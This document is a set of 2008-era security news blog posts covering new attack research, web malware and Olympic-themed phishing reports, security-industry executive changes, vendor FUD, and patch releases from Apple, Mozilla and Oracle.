There has been a lot of interesting work going on in the research community of late on a handful of really specialized and esoteric application attacks, like Mark Dowd’s NULL pointer attack and David Litchfield’s lateral SQL injection technique. These two methods have a few things in common, specifically the fact that they both exploit things that were thought to be unexploitable. One other similarity is that some people seem to be dismissing these techniques as theoretical or purely academic thought exercises that will never see the light of day. Proponents of this line of thinking say that enterprises don’t need to worry about crazy, multi-step attacks that are hard to understand. It’s things like buffer overflows and worms that really need your attention, they say.

This is, ah, how should I put it, ridiculous. These new attacks are exactly the kind of things that should worry you if you’re charged with protecting a corporate network. Hackers pay good money for reliable attack methods like this, particularly when they are brand new and not well understood. Security specialists know what a buffer overflow attack looks like, and there are any number of products out there that are capable of stopping these attacks. But the complex techniques like Litchfield’s and Dowd’s are the ones that find the cracks in network defenses and by the time they’re recognized for what they are, it’s game over. And who’s to say that some hacker in the Ukraine or Brazil or China hasn’t been using the same techniques for months?

Sure, worms and viruses and phishing are still threats, but to ignore new attacks because they look difficult or complex is foolish at best and negligent at worst.

The Web now hosts an “unprecedented” number of threats, according to a report recently released by Sophos. In the first quarter of this year, Sophos researchers discovered a newly infected Web page every five seconds, three times more than last year.

What’s especially unsettling is that a whopping 79% of these sites are legitimate ones that have been hacked. Sophos cites a March attack on a European soccer ticket site that tried to infect visitors’ computers and a February attack on UK broadcaster ITV that targeted Windows and Mac users. The top two malware threats found on the Web, Mal/Iframe and Mal/ObfJS, are used by criminals to infect Web sites by exploiting vulnerabilities, according to Sophos, a maker of antivirus software and other products.

The U.S. was the top country hosting Web-based malware in the first quarter. This year, it was responsible for hosting 42% of infected websites, up from last year, when it hosted less than 25%.

But while the number of infected Web pages is up this year, Sophos researchers tracked a decrease in the number of infected emails. One in every 2,500 emails was infected, a 40% drop from last year. Instead of sending a malicious attachment, criminals are sending links to compromised websites.

We’ve seen the protests in the streets, but now MessageLabs is warning that it has tracked 13 Olympic themed attacks, designed to spread malware and ultimately steal data.

The attacks are originating from IP addresses in Asia, but there’s no surprises here. The attackers are using social engineering to trick end users into clicking on a malicious link in an email message.

I was in San Francisco, attending RSA Conference 2008 when the Olympic torch was carried through the streets. All the security detail had to do to avoid protestors was to change the running route at the last minute. Unfortunately there’s no real “safe zone” in cyberspace.

Messages are being sent with legitimate-sounding subject titles such as “The Beijing 2008 Torch Relay” and “National Olympic Committee and Ticket Sales Agents,” MessageLabs said. Some attacks purport to be from the International Olympic Committee, based in Lausanne Switzerland.

Let’s be honest here, these guys aren’t protesting the Beijing Olympics, they’re trying to steal identities and make a quick buck. They’re also doing a good job staying under the radar, according to MessageLabs. They’re using Microsoft Office Database (MDB) files–usually hidden within a ZIP files–in order to avoid detection by traditional antivirus engines.

Secure Computing today named Daniel Ryan as interim CEO. He replaces John McNulty, who served as board chairman and CEO since 1999.

Ryan has served as the company’s president and chief operating officer since last August. Richard Scott, a Secure Computing board member since January 2006, was appointed chairman. McNulty will continue as a board member.

The San Jose-based vendor, which makes Web security gateways and other products, didn’t explain why McNulty is stepping down. A call to a company press contact was not immediately returned.

McNulty’s tenure included Secure Computing’s $274 million acquisition of email security vendor CipherTrust in 2006, which closely followed its $295 million acquisition of CyberGuard. Scott was a CyberGuard board member.

IBM’s X-Force security research team and IBM Research are studying ways to protect virtual computing environments. Code named Phantom, the research project has been ongoing and could result in new products and best practices designed to leverage the hypervisor to improve security. In this interview at RSA 2008, Joshua Corman, principal security strategist with IBM’s ISS team, explains Project Phantom and how IBM says it could help alleviate some of the risks associated with virtual environments.

Richard Stiennon, the well-traveled vendor executive and industry analyst, has taken up a new post as the CEO of new MSSP Seccom Global, an offshoot of Seccom Networks, an Australian company. Stiennon is a former Gartner analyst who probably is best known for a research study he was involved with in 2003 declaring that IDS was dead and encouraging enterprises to spend whatever money they had allocated for the technology on things like multi-function firewall appliances. “Intrusion detection systems are a market failure,” he said at the time. Most recently Stiennon was the chief marketing officer at Fortinet, which is a partner of Seccom. He also has spent time at independent analyst firm IT-Harvest, Webroot and PriceWaterhouseCoopers.

Seccom’s Australian operation provides a number of managed security services, including mail and network monitoring. Stiennon’s appointment as CEO coincides with the company’s entry into the U.S. market, which already has its fair share of MSSPs. Large players such as VeriSign and Symantec have staked out the high end of the market and many ISPs, such as AT&T, have gotten into the business of offering security services in the cloud, as well. It will be interesting to see how an unknown company such as Seccom goes about competing with the big established MSSPs here. One would guess that Stiennon’s name recognition and extensive experience in the industry will help open a few doors at the very least.

I recently tripped over a blog write-up from independent analyst Eric Ogren about his irritation with security vendors using FUD to sell products. It’s an older posting from 2006 but his message is as relevant today as it was two years ago.

Building his case around a threat report Websense released at the time, he wrote, “I’m not sure that the world is better off with yet another security vendor telling us that Phishing, malicious websites, malicious code, hacking tools, P2P, IM and Chat attacks have all increased.”

He dismissed the report as FUD marketing designed to create demand for security products, but that he believed the reports could actually have the opposite effect by pointing out the futility of security products to stop attacks.

He’s not the first security expert to rail against the FUD factor. Security luminary Bruce Schneier has devoted huge chunks of his time speaking out against security ‘theatre’ — policies and products that are more about offering the perception of security rather than addressing the actual risks.

And, rightly or wrongly, the Apple crowd is constantly crying FUD whenever something is written about a security flaw or malware affecting their beloved Macs.

I bring up the issue because it’s long been a source of irritation for me. As a security writer, I’m constantly buried beneath tons of voicemail and email from vendors looking for attention, and the PR machinery almost always uses FUD to make a case for buying the latest compliance-out-of-the-box appliance or the “first of its kind” bot/spyware/worm/common cold zapper.

Along the way, the PR community likes to invent new words or phrases to define the threat, many of which start with the letters “ph” (phishing, pharming, phlooding).

I’ve been looking back through four years of writing for the sake of nostalgia. The big thing that strikes me is that we’ve written a lot of stories about the latest flaw or exploit and someone is always banging on the alarm bell with a hammer.

In the final analysis, it’s prudent to flag the latest flaws and exploits because IT security professionals need to be aware of these things and incorporate the information into their patch management process. Heck, alerting them to these things is what we’re here for. But the tone and level of alarm that should go into these stories is always something we wrestle with.

Everyone has a role to play in information security, from the IT pros to the vendors, analysts and media. But from the content I look back on, I see little evidence that vendor-generated fear has ever made a difference.

Warnings about some flaw or exploit opening the door for a catastrophic Internet-ending event are never followed by the big doom. On the other side of the spectrum, the epidemic of data security breaches shows that all the FUD and security spending in the world can’t prevent the bad guys from punching through. The recent Hannaford supermarkets breach proves you can respond to the fear and spend a lot of money on new technology and still get whacked.

I recently asked Rhode Island-based network engineer Edward Ziots whether he jumps at every exploit warning. Here’s what he told me by email:

“We don’t jump, it would be imprudent to do so. Basically I read up on how the exploit works, even look at the code offline to ascertain if it would be available to be downloaded or how much effort would it take to be in a working exploit. Next, you basically need to adjust your risk assessment based on the controls you have in house, and how many systems could be affected and in what manner.

“Lastly communicate the adjusted risk assessment to management, security and await decision on whether to raise priority for patching, or to deploy other security measures to mitigate until all systems can be patched.

“Honestly, it makes it very difficult with exploit code in the wild and reports of working exploits not to raise your risk level and deploy extra manpower and time and effort to get all systems patched. It’s just due diligence.”

My advice is to take the FUD with a grain of salt and remember that while cyberspace is a dangerous place and you’ll sometimes have to raise your level of alertness as Ziots does, most enterprises will survive with the proper mix of security tools, policies and a calm awareness of the risks.

About Security Blog Log: Senior News Writer Bill Brenner peruses security blogs each day to see what’s got the information security community buzzing. In this column he lists the weekly highlights. If you’d like to comment on the column or bring new security blogs to his attention, contact him at bbrenner@techtarget.com.

A couple of notable security fixes to flag this morning:

First, Apple has patched the Safari Web browser flaw that famously earned a researcher $10,000 at the CanSecWest conference last month. Independent Security Evaluators researcher Charlie Miller used the vulnerability to compromise a MacBook Air laptop. The flaw is rooted in the WebKit open-source HTML rendering engine Safari and several other Mac OS X programs use.

Next, Mozilla has released Firefox 2.0.0.14, fixing a critical security hole in the JavaScript engine of Firefox. The advisory said, “Fixes for security problems in the JavaScript engine described in MFSA 2008-15 (CVE-2008-1237) introduced a stability problem, where some users experienced crashes during JavaScript garbage collection. This is being fixed primarily to address stability concerns. We have no demonstration that this particular crash is exploitable but are issuing this advisory because some crashes of this type have been shown to be exploitable in the past.”

Oracle said Thursday that it is prepping a Critical Patch Bulletin (CPU) to address 41 security holes across its product line.

According to the database giant’s advance CPU bulletin, attackers could exploit the most severe flaws to compromise the database server or the host operating system. Affected products include Oracle
Database, Oracle Application Server, Oracle E-Business Suite and Applications, Oracle Enterprise Manager, Oracle PeopleSoft Enterprise and Oracle Siebel SimBuilder.

Oracle releases its security patches on a quarterly basis, and the April 2008 installment will be issued Tuesday.

Ira Hanson-Ralph of EnCana explains why the oil and gas exploration company made log management a priority as part of its compliance program. Hanson-Ralph is EnCana’s group leader of IS compliance and controls monitoring. The interview was conducted at RSA Conference 2008.